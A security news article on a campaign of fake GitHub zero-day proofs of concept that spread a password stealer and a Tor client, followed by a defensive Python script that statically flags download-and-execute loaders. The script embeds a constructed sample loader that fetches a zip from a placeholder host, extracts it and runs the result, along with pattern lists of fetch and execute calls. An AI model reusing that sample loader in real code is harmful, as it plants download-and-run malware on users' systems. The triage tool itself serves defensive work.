Internet related News · 2023-06-15

Beware: Fake Zero-Day PoC Exploits on GitHub Spreading Windows and Linux Malware

According to cybersecurity firm VulnCheck, attackers are spreading malware to Windows and Linux systems by publishing counterfeit proof-of-concept exploits for supposed zero-day vulnerabilities.

The malicious exploits are being promoted through a fabricated cybersecurity firm named High Sierra Cyber Security, which has set up bogus Twitter and GitHub accounts to advertise its repositories. VulnCheck has observed the campaign running since at least May 2023, and it targets cybersecurity researchers and firms involved in vulnerability research. The purported exploits claim to target well-known software such as Chrome, Discord, Signal, WhatsApp, and Microsoft Exchange. The malware is delivered by a Python script that functions as a downloader on both Linux and Windows.

The Windows variant of the malware operates as a password-stealing Trojan, while the Linux variant installs a Tor client. The Windows binary is flagged as malicious by more than 60% of the anti-virus engines on VirusTotal. The downloader saves the payload in either the Windows %Temp% directory or the Linux /home//.local/share directory, where it is extracted and executed. VulnCheck notes that the threat actors are persistent, creating new accounts and repositories whenever the existing ones are taken down. At the time of writing, the attackers are using seven GitHub repositories, and security researchers and enthusiasts are advised to exercise caution when downloading scripts from unfamiliar repositories.
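The loader behaviour described above (fetch a payload, drop it under a temp or user directory, extract and run it) is something a researcher can check for statically before executing an unfamiliar PoC. The following is an added example written for this article, not VulnCheck's tooling and not code from the campaign: it parses a Python script with the `ast` module and flags the download-then-execute combination. The two embedded scripts (`SAMPLE_POC`, `BENIGN_SCRIPT`) are constructed for illustration, and the URL in the sample is a placeholder.

```python
"""Static triage of a Python PoC before running it.

Heuristic only: it looks for the three ingredients of the downloader the
article describes (a network fetch, a temp/user drop directory, and a call
that executes something) and reports them with line numbers.
"""
import ast
import sys
from dataclasses import dataclass, field

# Dotted-name suffixes to match. Full module paths avoid false positives such
# as dict.get being mistaken for requests.get.
DOWNLOAD_PATTERNS = ("requests.get", "urlopen", "urlretrieve")
EXEC_PATTERNS = ("os.system", "subprocess.Popen", "subprocess.run",
                 "subprocess.call", "os.startfile", "os.execv", "Popen", "startfile")
DECODE_PATTERNS = ("b64decode", "b32decode", "zlib.decompress")
DROP_DIR_CALLS = ("gettempdir", "mkdtemp")
DROP_DIR_STRINGS = ("%temp%", "/tmp", ".local/share", "appdata")

# Constructed sample resembling the article's loader (placeholder URL).
SAMPLE_POC = '''\
import os, tempfile, urllib.request, zipfile
def exploit(target):
    url = "http://example.invalid/poc.zip"
    dest = os.path.join(tempfile.gettempdir(), "poc.zip")
    urllib.request.urlretrieve(url, dest)
    with zipfile.ZipFile(dest) as z:
        z.extractall(tempfile.gettempdir())
    os.system(os.path.join(tempfile.gettempdir(), "poc.exe"))
'''

# Constructed benign script: reads a JSON file and prints a field.
BENIGN_SCRIPT = '''\
import json
def main(path):
    with open(path) as f:
        data = json.load(f)
    print(data.get("version"))
'''


@dataclass
class TriageResult:
    downloads: list = field(default_factory=list)
    executes: list = field(default_factory=list)
    drop_paths: list = field(default_factory=list)
    decodes: list = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        # All three ingredients present: fetch, drop directory, execute.
        return bool(self.downloads and self.executes and self.drop_paths)


def _dotted(node: ast.AST) -> str:
    """Render a Name/Attribute chain such as urllib.request.urlretrieve."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return ""


def _matches(name: str, patterns) -> bool:
    return any(name == p or name.endswith("." + p) for p in patterns)


def triage_source(source: str) -> TriageResult:
    """Walk the AST and collect (line, name) hits for each category."""
    result = TriageResult()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call):
            name = _dotted(node.func)
            if _matches(name, DOWNLOAD_PATTERNS):
                result.downloads.append((node.lineno, name))
            elif _matches(name, EXEC_PATTERNS):
                result.executes.append((node.lineno, name))
            elif _matches(name, DECODE_PATTERNS):
                result.decodes.append((node.lineno, name))
            elif _matches(name, DROP_DIR_CALLS):
                result.drop_paths.append((node.lineno, name))
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            # Hard-coded drop directories such as "%TEMP%" or "~/.local/share".
            if any(m in node.value.lower() for m in DROP_DIR_STRINGS):
                result.drop_paths.append((node.lineno, node.value))
    return result


if __name__ == "__main__":
    src = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_POC
    r = triage_source(src)
    print("SUSPICIOUS: download-and-execute pattern" if r.suspicious else "no loader pattern")
    for label, hits in (("download", r.downloads), ("execute", r.executes),
                        ("drop dir", r.drop_paths), ("decode", r.decodes)):
        for line, name in hits:
            print(f"  {label:9} line {line}: {name}")
```

Run it with a path argument to triage a downloaded script, or with no argument to see the constructed sample flagged. A hit is a reason to read the script in a sandbox, not proof of malice; a real PoC may legitimately use `subprocess`, so the signal is the combination of fetch, drop and execute rather than any one call.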

The bogus cybersecurity firm behind the campaign adopts the identities of legitimate security researchers associated with firms such as Rapid7 to lend credibility to its repositories. The same personas maintain Twitter accounts to draw victims in from the social media platform. The repositories themselves look legitimate, which makes the counterfeit exploits hard to distinguish from genuine ones. The attackers are most likely targeting cybersecurity researchers to gain unauthorized access to their systems, which can then be used for data theft or as a foothold for further attacks. While the campaign's level of success remains uncertain, the threat actors demonstrate persistence by continuously establishing new accounts and repositories.
